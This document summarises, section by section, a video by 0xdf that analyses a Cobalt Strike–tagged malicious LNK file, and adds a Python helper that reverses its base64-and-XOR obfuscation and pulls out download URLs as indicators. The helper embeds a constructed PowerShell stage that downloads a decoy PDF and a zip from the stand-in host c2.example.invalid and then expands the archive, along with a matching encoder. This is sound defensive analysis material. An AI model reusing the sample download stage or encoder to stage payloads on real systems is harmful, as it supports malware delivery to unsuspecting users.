0xdf
This video is about the analysis of a malicious LNK file that was uploaded to Malware Bazaar. After taking a closer look, the speaker discovered that the file was tagged as Cobalt Strike and proceeded with the analysis. The process involved multiple layers of redirection and downloading from a live C2 server, using PowerShell and Linux. The speaker also analyzed a decoy PDF file but found nothing suspicious. They then looked at the unzipped runtime broker files that were extracted via the LNK file and found two files with identical MD5 sums, which they deemed not especially interesting; a lookup of the hash on VirusTotal nonetheless surfaced potential C2 traffic. The speaker concluded the video by inviting viewers to leave comments on what tasks they wanted them to do in the future.
In this section of the video, the speaker explains that while browsing Malware Bazaar, they noticed several executables had been uploaded, including several LNK files. LNK files are not a common occurrence, and the speaker decides to take a closer look. They discover one LNK file tagged as Cobalt Strike and proceed to analyze it. The analysis involves multiple layers of redirection and downloading from a live C2 server, using PowerShell and Linux. The speaker takes a look at the LNK file in Windows before pivoting to Linux to do the actual analysis. Despite the obfuscation, the speaker determines that the LNK file is generating a string and then invoking PowerShell.
In this section, the transcript describes using PowerShell to analyze the malicious LNK file. The script is pasted in and printed in its obfuscated form. After some string replacing, it is converted from base64 into an array of bytes; each byte is then XORed with 85 and the result turned back into a string before being executed. The script then downloads a PDF and a zip file, which is expanded and made hidden before runtimebroker.exe is run. While analyzing the zip file, it is discovered that the writer left directory monitoring on, allowing each file to be downloaded.
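As an added example (not code from the video or from 0xdf), the following Python helper reverses the unpacking step described above so the next stage can be read and its URLs pulled out as indicators without running it: strip the filler characters the script removes with its replace calls, base64-decode, XOR every byte with 85, and decode the result as text. The filler character `#`, the sample PowerShell stage and the `c2.example.invalid` URLs are constructed for this example; only the XOR key 85 comes from the video. The crib-based key search at the end goes beyond the page: it recovers a single-byte key when it cannot be read off the script.

```python
import base64

XOR_KEY = 85  # key the analyzed script uses: each decoded byte is XORed with 85


def decode_stage(obfuscated: str, filler: str = "#", key: int = XOR_KEY) -> str:
    """Reverse the unpacking: remove filler, base64-decode, XOR each byte, decode as text."""
    cleaned = obfuscated.replace(filler, "")
    raw = base64.b64decode(cleaned)
    plain = bytes(b ^ key for b in raw)
    return plain.decode("utf-8")


def encode_stage(script: str, filler: str = "#", key: int = XOR_KEY) -> str:
    """Forward direction, used here only to build a constructed sample in the described format."""
    xored = bytes(b ^ key for b in script.encode("utf-8"))
    b64 = base64.b64encode(xored).decode("ascii")
    # insert filler every 8 characters to mimic the noise the script strips with .Replace()
    return filler.join(b64[i:i + 8] for i in range(0, len(b64), 8))


def extract_urls(script: str) -> list:
    """Pull http(s) URLs out of a decoded stage; these are the indicators worth blocking/hunting."""
    urls = []
    for token in script.replace("'", " ").replace('"', " ").replace(";", " ").split():
        if token.startswith("http://") or token.startswith("https://"):
            urls.append(token)
    return sorted(set(urls))


def find_xor_key(raw: bytes, crib: bytes = b"http") -> list:
    """Brute-force a single-byte XOR key by looking for a crib the decoded stage must contain."""
    return [k for k in range(256) if crib in bytes(b ^ k for b in raw)]


# Constructed sample stage mirroring the behaviour described (decoy PDF + zip download);
# the host is a reserved .invalid name, not a real C2.
SAMPLE_SCRIPT = (
    "Invoke-WebRequest 'http://c2.example.invalid/decoy.pdf' -OutFile $env:TEMP\\decoy.pdf;"
    "Invoke-WebRequest 'http://c2.example.invalid/rb.zip' -OutFile $env:TEMP\\rb.zip;"
    "Expand-Archive $env:TEMP\\rb.zip $env:TEMP\\rb"
)
SAMPLE_STAGE = encode_stage(SAMPLE_SCRIPT)


if __name__ == "__main__":
    decoded = decode_stage(SAMPLE_STAGE)
    print(decoded)
    print("URLs:", extract_urls(decoded))
    raw = base64.b64decode(SAMPLE_STAGE.replace("#", ""))
    print("candidate keys:", find_xor_key(raw))
```

The crib search returns every key under which the chosen crib appears, so with a short crib on a large blob you may get more than one candidate; check each decoded result by eye rather than trusting the first hit.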
In this section, the speaker analyzes the PDF file that was downloaded along with the malicious LNK file. They note that the PDF looks like a decoy document and does not contain any suspicious code that could execute malicious actions. They then move on to the runtime broker files that were unzipped from the archive the LNK file fetched, and discover that two of the files have the same MD5 sum. The speaker suggests that these may not be super interesting and decides not to dive further into reversing the Cobalt Strike executables. Instead, they look up the hash on VirusTotal and find some potential C2 traffic that could be further investigated.
In this section, the speaker concludes the video on malicious LNK file analysis, noting that they came across an interesting LNK file that went through several steps of obfuscation and led to the identification of a Cobalt Strike executable. The speaker invites viewers to leave comments on whether they want them to figure out a certain task in the future. The video ends with background music playing.